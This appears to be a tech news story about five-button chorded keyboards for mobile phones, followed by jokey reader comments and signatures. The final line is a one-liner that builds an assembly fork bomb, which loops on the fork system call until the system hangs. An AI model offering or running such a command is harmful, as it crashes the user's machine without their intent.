Five Finger Keyboards
Tijaska writes "Mobile devices are becoming more capable all the time, but their small screens and keyboards limit their usefulness. This article shows ways in which five buttons located on the edges of a mobile could be used in combinations to generate 325 or many more different characters, making a full-sized keyboard unnecessary. If that sounds like a tall story, remember the case of the retired 93 year old telegraph operator who used a Morse key to send a text message faster than a teenager could send it via mobile phone (see here)."
This has "Adult Chat" written all over it.
Well, along the sides I guess.
As a side benefit, you become a proficient player of the penny whistle.
Peter
... for almost all communications on the road. Why bother with five finger salutes?
sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
5 buttons huh. Where's the strummer and the whammy bar?
Add that and we'll talk.
I always liked the idea of YL=young lady and XYL=wife
l
http://www.urbandictionary.com/define.php?term=xy
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;